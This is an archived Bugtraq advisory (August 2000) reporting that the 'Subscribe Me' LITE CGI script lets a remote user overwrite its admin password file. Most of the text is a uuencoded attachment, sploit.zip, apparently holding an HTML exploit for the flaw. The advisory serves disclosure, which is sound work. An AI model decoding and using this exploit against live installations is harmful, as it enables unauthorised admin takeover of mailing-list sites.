Date: Wed, 23 Aug 2000 19:06:29 -0700 From: n30 <n30@ALLDAS.DE> Subject: Subscribe Me Vulnerability To: BUGTRAQ@SECURITYFOCUS.COM Product: Subscribe Me Versions: ALL version numbers LITE only OS: Unix and Winnt Vendor: Notified, http://www.cgiscriptcenter.com/ The Problem: Yet again the script allows a remote user to overwrite the Admin Passwd file with any password they see fit. Therefore giving them Admin access to the Maillist Script Exploit: See the .zip file Attached Patches: Already Available see website, download version is patched. n30 n30@alldas.de www.alldas.de begin 666 sploit.zip M4$L#!!0``@`(`%!T%RDZ3)<F,P(``/<%```,````17AP;&]I="YH=&ULK53; M;IM $'VOU'\8;5\30],^68"*[;6-9"Z"=:ST;0WK>B5@$:SCYN^SZP#!;M*F MDI% S&AN9\[,6'M9Y,[G3]8\C'UPI\0+`QOMI:S&AG$\'D?I+]ZD-:]DRDK) MZE$J"D/I;K>\-)K#MJI%Q@JA?[79EHVJ'(&/R3*<V2@*$X)4=%"/-<4!P;%C M3>).0]S)"L,DC&<XMI&)8./-R-)&WTVS\])6DW#V,!#C_E]+LX$TT$<JCZ- M!03F[A3;Z)'5&2WI#=":T_P&]BQ_9)*G%+5FTW 5JBJ^S.>FJ?,G':+7J `^ M@Y5'L&5H%P<22>6A&8.;%;R$B#;-4=09)$S"_2$O64VW/.?R"?#O*A=<MGZ6 MH6HSHB&.KCG_4?%EP>4WLX_?ACMOR"EVXOU4L6^_HG]GB7)&&P8GWD'N&01X M,X ZAE&?[RTL0Y8NB':&/;T@^$^26Z+!77D+-9RQMUBJJ;*\(%H3( ^10A&Y M2;)1X1$$KJ_DZI@I"^-L.KIY.>O#W0?Z4+6\]F@OPBI%?/7R[ZY7?RK*':\+ M*KDHKX/AA6$TV.7>: @K64]\CW2@&B8U+7#OKM9*A-.:]#L#[^/]>Y(8)[C/ M@=Y!ICX70Z8T>BA?=^7,\0VGSN%T*P/RTO^/K)$^1 H"$ %KM4Z^R/CN"1)Q MJ%.FE9'@I00I8'A#091 W'B!%=.L5M%!QSB]%/8UV]FHH#R78JS6_@?-\XPV MHXPA1VMO"V89= A-7W==N=&>^V=02P$"% `4``(`" !0=!<I.DR7)C,"``#W M!0``# `````````!`" `MH$`````17AP;&]I="YH=&UL4$L%!@`````!``$` *.@```%T"```````` ` end